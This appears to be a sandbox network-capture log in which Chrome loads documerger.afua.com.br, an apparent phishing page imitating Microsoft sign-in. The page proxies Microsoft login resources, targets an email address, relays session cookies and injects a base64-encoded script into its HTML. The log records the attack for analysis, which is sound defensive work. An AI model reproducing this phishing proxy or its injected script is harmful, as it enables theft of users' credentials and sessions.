                                                  2024-11-27 17:09:56 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:57 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:56 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                  ETag: "0x8DC582B9C710B28"
                                                  x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170956Z-174f784596886s2bhC1EWR743w0000000x9000000000ambn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  64192.168.2.64977913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:56 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:57 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:57 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                  ETag: "0x8DC582BA54DCC28"
                                                  x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170957Z-174f78459685m244hC1EWRgp2c0000000x30000000008pmh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:57 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  65192.168.2.64978194.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC1380OUTGET /?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-Dest: document
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                  2024-11-27 17:09:59 UTC3132INHTTP/1.1 200 OK
                                                  Cache-Control: no-store, no-cache
                                                  Pragma: no-cache
                                                  Content-Type: text/html; charset=utf-8
                                                  Expires: -1
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                  x-ms-request-id: 091d8c7d-7a26-48e4-a3c0-e7b4b99e5f01
                                                  x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                  nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                  x-ms-srs: 1.P
                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                  Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-fVM4lSA0zinkNUkwBi3iKw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                  Set-Cookie: buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; expires=Fri, 27-Dec-2024 17:09:58 GMT; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; domain=documerger.afua.com.br; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; domain=documerger.afua.com.br; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA; expires=Fri, 27-Dec-2024 17:09:58 GMT; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                  Date: Wed, 27 Nov 2024 17:09:58 GMT
                                                  Connection: close
                                                  content-length: 40320
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:09:59 UTC13252INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64
                                                  Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xd
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 65 76 69 63 65 46 69 6e 67 65 72 70 72 69 6e 74 69 6e 67 22 3a 22 22 2c 22 75 72 6c 50 49 41 45 6e 64 41 75 74 68 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6f 63 75 6d 65 72 67 65 72 2e 61 66 75 61 2e 63 6f 6d 2e 62 72 2f 63 6f 6d 6d 6f 6e 2f 50 49 41 2f 45 6e 64 41 75 74 68 22 2c 22 66 43 42 53 68 6f 77 53 69 67 6e 55 70 22 3a 74 72 75 65 2c 22 66 4b 4d 53 49 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 4c 6f 67 69 6e 4d 6f 64 65 22 3a 31 2c 22 66 41 6c 6c 6f 77 50 68 6f 6e 65 53 69 67 6e 49 6e 22 3a 74 72 75 65 2c 22 66 41 6c 6c 6f 77 50 68 6f 6e 65 49 6e 70 75 74 22 3a 74 72 75 65 2c 22 66 41 6c 6c 6f 77 53 6b 79 70 65 4e 61 6d 65 4c 6f 67 69 6e 22 3a 74 72 75 65 2c 22 69 4d 61 78 50 6f 6c 6c 45 72 72 6f 72 73 22 3a 35 2c 22 69 50 6f 6c 6c 69 6e 67 54
                                                  Data Ascii: eviceFingerprinting":"","urlPIAEndAuth":"https://documerger.afua.com.br/common/PIA/EndAuth","fCBShowSignUp":true,"fKMSIEnabled":false,"iLoginMode":1,"fAllowPhoneSignIn":true,"fAllowPhoneInput":true,"fAllowSkypeNameLogin":true,"iMaxPollErrors":5,"iPollingT
                                                  2024-11-27 17:09:59 UTC10684INData Raw: 69 70 74 22 2c 72 2e 73 72 63 3d 65 2c 72 2e 64 65 66 65 72 3d 21 31 2c 72 2e 61 73 79 6e 63 3d 21 31 2c 74 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 6e 6f 6e 63 65 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 6f 6e 63 65 22 29 3b 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 6f 6e 63 65 22 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 72 29 7b 76 61 72 20 74 3d 67 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 3b 72 65 74 75 72 6e 20 74 2e 73 72 63 3d 65 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 72 29 7b 69 66 28 65 26 26 65 2e 6c 65 6e 67 74 68 3e 30 26 26 72 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 69 66 28 2d 31 21 3d 3d 72 2e 69 6e 64 65
                                                  Data Ascii: ipt",r.src=e,r.defer=!1,r.async=!1,t){var n=t.nononce||t.getAttribute("nononce");r.setAttribute("nononce",n)}return r}function s(e,r){var t=g.createElement(r);return t.src=e,t}function d(e,r){if(e&&e.length>0&&r){for(var t=0;t<e.length;t++){if(-1!==r.inde


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  66192.168.2.64978094.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC1238OUTGET /favicon.ico HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
                                                  2024-11-27 17:09:58 UTC1868INHTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                  x-ms-request-id: 9f67a086-0c0d-4403-9d54-a82b6fcdba00
                                                  x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                  nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                  x-ms-srs: 1.P
                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                  Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-bTmh0LgoI4xcwOro9nptEg' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                  Date: Wed, 27 Nov 2024 17:09:57 GMT
                                                  Connection: close
                                                  Content-Length: 0
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  67192.168.2.64978294.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:58 UTC999OUTGET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                                  2024-11-27 17:09:59 UTC1343INHTTP/1.1 200 OK
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Age: 4805974
                                                  Cache-Control: public, max-age=31536000
                                                  Content-MD5: m5bMCfnonQM0ui+8IrUZeg==
                                                  Content-Type: application/x-javascript
                                                  Date: Wed, 27 Nov 2024 17:09:58 GMT
                                                  Etag: 0x8DCE31CBE97473C
                                                  Last-Modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                  Server: ECAcc (muc/337C)
                                                  Vary: Accept-Encoding
                                                  X-Cache: HIT
                                                  x-ms-blob-type: BlockBlob
                                                  x-ms-lease-status: unlocked
                                                  x-ms-request-id: 1a3e6800-b01e-0067-7b39-154432000000
                                                  x-ms-version: 2009-09-19
                                                  content-length: 142378
                                                  Connection: close
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:09:59 UTC15041INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                  Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 74 28 22 73 70 61 6e 22 29 3b 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 22 72 65 64 22 2c 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3d 22 62 6c 75 65 22 2c 65 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 74 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 3b 43 3d 74 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 3d 3d 74 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 41 26 26 21 43 26 26
                                                  Data Ascii: t("span");e.style.borderLeftColor="red",e.style.borderRightColor="blue",e.style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var t=_.getComputedStyle(e);C=t.borderLeftColor===t.borderRightColor,document.body.removeChild(e),A&&!C&&
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 54 49 4c 45 5f 55 52 4c 3a 22 54 69 6c 65 55 72 6c 22 2c 43 49 44 3a 22 43 49 44 22 2c 50 55 49 44 3a 22 50 55 49 44 22 7d 2c 74 2e 44 45 46 41 55 4c 54 5f 43 48 41 4e 4e 45 4c 5f 49 44 3d 22 35 33 65 65 32 38 34 64 2d 39 32 30 61 2d 34 62 35 39 2d 39 64 33 30 2d 61 36 30 33 31 35 62 32 36 38 33 36 22 2c 74 2e 44 45 46 41 55 4c 54 5f 50 52 45 46 45 52 52 45 44 5f 45 58 54 45 4e 53 49 4f 4e 5f 49 44 3d 22 70 70 6e 62 6e 70 65 6f 6c 67 6b 69 63 67 65 67 6b 62 6b 62 6a 6d 68 6c 69 64 65 6f 70 69 6a 69 22 2c 74 2e 57 65 62 4e 61 74 69 76 65 42 72 69 64 67 65 53 75 63 63 65 73 73 3d 22 53 75 63 63 65 73 73 22 2c 74 2e 44 46 50 50 72 65 66 69 78 3d 22 64 66 70 3a 22 2c 74 2e 45 72 72 6f 72 3d 7b 53 5f 4f 4b 3a 22 30 22 2c 49 6e 76 61 6c 69 64 52 65 61 6c 6d 44
                                                  Data Ascii: TILE_URL:"TileUrl",CID:"CID",PUID:"PUID"},t.DEFAULT_CHANNEL_ID="53ee284d-920a-4b59-9d30-a60315b26836",t.DEFAULT_PREFERRED_EXTENSION_ID="ppnbnpeolgkicgegkbkbjmhlideopiji",t.WebNativeBridgeSuccess="Success",t.DFPPrefix="dfp:",t.Error={S_OK:"0",InvalidRealmD
                                                  2024-11-27 17:09:59 UTC16384INData Raw: 3d 6a 51 75 65 72 79 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 3d 5b 74 2c 6e 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 61 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 7d 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 74 79 70 65 6f 66 20 65 20 69 6e 20 43 29 26 26 65 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 28 6e 3d 53 2e 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 61 2c 65 28 29 7d 29 2c 74 29
